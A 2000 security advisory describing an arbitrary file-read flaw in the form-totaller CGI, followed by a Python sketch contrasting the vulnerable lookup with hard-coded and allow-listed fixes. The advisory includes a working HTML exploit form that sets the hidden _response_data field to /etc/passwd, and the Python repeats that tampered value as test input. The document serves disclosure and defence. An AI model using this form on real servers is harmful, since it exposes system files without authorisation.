Vulnerable form-totaller CGI allows remote file access via insecure response data field.
`Content-Type: Remote Root via vulnerable CGI software
Date : 13/08/2000
Sender : s1gnal_9 <[email protected]>
Subject : form-totaller Vulnerable CGI
X-System : UNIX/NT systems running the form-totaller CGI software
X-Status : s1gnal_9-ADVISORY-form-totaller.txt
X-Greets : Narr0w, f0bic, VetesGirl
_________________________________________________________________________________
PRODUCT NAME: form-totaller version 1.0
PRODUCT HOMEPAGE: http://www.newbreedsoftware.com/form-totaller/
Also Available at freecode.com
DESCRIPTION :
Use "form-totaller" to create tests and quizzes on the web.
Use forms with pull-down menus or radio buttons and this CGI will display
output based on their input.
PROBLEM:
The command field "_response_data" is the field that specifies the display output
based on their input.
The default file for this field is set at:
<input type="hidden" name="_response_data" value="responses.dat">
A remote attacker could easily change the form submitted to the CGI script so that
it uses "/etc/passwd" as the response data value.
EXAMPLE:
Below is an example of how we could read files on the remote system.
<-------------------------CUT HERE-------------------------------------->
<form action="http://www.SOMESERVER.com/form-totaller/form-totaller.cgi" method="post">
<input type="hidden" name="_response_top" value="top.html">
<input type="hidden" name="_response_data" value="/etc/passwd">
<input type="hidden" name="_response_bottom" value="bottom.html">
<input type="hidden" name="_divide_by" value="4">
<input type="submit" value="Click for viewing of the /etc/passwd file.">
</form>
<-------------------------CUT HERE-------------------------------------->
SOLUTION
I would recommend hard-coding the response_data file right into the script
and leaving that command field out of the CGI.
Please visit www.zone.ee/unix :)
`
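The hard-coding fix recommended under SOLUTION, sketched in Python as an added example; it is not the form-totaller source or the advisory author's code. The install directory, the `quiz2.dat` name, the function names and the model of the unpatched lookup are assumptions, and the allow-list variant goes beyond the advisory's fix for sites that need the field to choose between several data files.

```python
import os

DATA_DIR = "/var/www/form-totaller"       # hypothetical install directory
DEFAULT = "responses.dat"                 # default value shown in the advisory
ALLOWED = {"responses.dat", "quiz2.dat"}  # quiz2.dat is a made-up second quiz

# Constructed input: the fields posted by the advisory's example form.
TAMPERED_FORM = {
    "_response_top": "top.html",
    "_response_data": "/etc/passwd",
    "_response_bottom": "bottom.html",
    "_divide_by": "4",
}

def data_path_before(form, data_dir=DATA_DIR):
    """Assumed model of the unpatched behaviour: the client's value is used as-is.
    Joining it to a base directory does not help, an absolute name wins."""
    return os.path.join(data_dir, form.get("_response_data", DEFAULT))

def data_path_hardcoded(form, data_dir=DATA_DIR):
    """The advisory's fix: the _response_data field is never consulted."""
    return os.path.join(data_dir, DEFAULT)

def data_path_allowlisted(form, data_dir=DATA_DIR):
    """Variant: the field may only select one of a fixed set of file names."""
    name = form.get("_response_data", DEFAULT)
    if name not in ALLOWED:
        raise ValueError("unknown response data file: %r" % name)
    root = os.path.realpath(data_dir)
    path = os.path.realpath(os.path.join(root, name))
    # An allowed name that is a symlink must still resolve inside data_dir.
    if os.path.commonpath([root, path]) != root:
        raise ValueError("response data file resolves outside %s" % root)
    return path

if __name__ == "__main__":
    print("before:    ", data_path_before(TAMPERED_FORM))
    print("hard-coded:", data_path_hardcoded(TAMPERED_FORM))
    try:
        data_path_allowlisted(TAMPERED_FORM)
    except ValueError as exc:
        print("allow-list:", exc)
```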